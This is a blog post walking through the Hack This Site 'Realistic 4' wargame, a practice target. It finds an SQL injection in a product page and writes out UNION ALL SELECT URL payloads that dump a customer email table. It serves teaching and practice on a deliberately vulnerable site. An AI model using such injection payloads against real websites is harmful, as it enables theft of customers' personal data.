What is it? @.@

Here is the place where I record some tactics about wargame, systems, and other security issues.

2012-09-18

Hack This Site! - Realistic 4

Description:

Fischer's Animal Products
FAP is a company that slaughters animals and turns their skin into overpriced products which are then sold to rich bastards! Help animal rights activists increase political awareness by hacking their mailing list. 

Realistic 4:
From: SaveTheWhales 

Message: Hello, I was referred to you by a friend who says you know how to hack into computers and web sites - well I was wondering if you could help me out here. There's this local store who is killing hundreds of animals a day exclusively for the purpose of selling jackets and purses etc out of their skin! I have been to their website and they have an email list for their customers. I was wondering if you could somehow hack in and send me every email address on that list? I want to send them a message letting them know of the murder they are wearing. Just reply to this message with a list of the email addresses. Please? Their website is at http://www.hackthissite.org/missions/realistic/4/. Thanks so much!!

Solution:
  1. Of course, view page source code is the basic. But in the mean time, you should also take a tour of the website.
  2. Obviously, there's a HTML input form smiling to you in the front page. Let's try it! Just input anything that's abnormal, which means NOT a correct email format.
  3. You will get an error message displayed in the page.
    Error inserting into table "email"! Email not valid! Please contact an administrator of Fischer's
  4. Okay~ now we know there's a TABLE named 'email' in the database, and that's our goal. We need to steal the data stored in the 'email' table.
  5. After million times attack to the input form, you'll find out there's nothing except the error message like above. So, we transfer our target to the product page.
  6. Visit the pages, and you could find out that the URL contains an magic id.
    Fur Coats!
    hxxp://www.hackthissite.org/missions/realistic/4/products.php?category=1
    Alligator Accessories!
    hxxp://www.hackthissite.org/missions/realistic/4/products.php?category=2
  7. If we append a single quotes in the end of the URL, you will get an empty page, but actually not really empty. View the page source code, there seems exist some HTML template code.
  8. Now we get another hint: Maybe there exist a SQL Injection vulnerability.
  9. Because we wanna utilize the SQL vulnerability of the product page to fetch the email addresses from TABLE 'email'. So, we need UNION ALL statement.
    Here is the reference and guide:
    http://hakipedia.com/index.php/SQL_Injection#UNION_Statements
  10. You can append the following statement at the end of the URL where the %20 is the Unicode character of SPACE.
    %20UNION%20ALL%20SELECT%20NULL%20FROM%20email;

    Your URL will like below:
    hxxp://www.hackthissite.org/missions/realistic/4/products.php?category=1%20UNION%20ALL%20SELECT%20NULL%20FROM%20email;
  11. By visiting the URL, you will  get an empty page again, because the number of columns selected from TABLE 'email' and maybe 'products' do not match. You need to increase the NULL value in the statement.
  12. Finally, when you append the following statement at the end of the URL, you will get a completely displayed product page. Now you know the product page select four column values from database.
    %20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL,%20NULL%20FROM%20email;
  13. So, change one of the NULL value to an asterisk, you'll get the email list of their customers.
    Visit: hxxp://www.hackthissite.org/missions/realistic/4/products.php?category=1%20UNION%20ALL%20SELECT%20NULL,%20*,%20NULL,%20NULL%20FROM%20email;
  14. Back to the description page, click your name and send the message to "SaveTheWhales ".
  15. Congratulations, you have successfully completed realistic 4!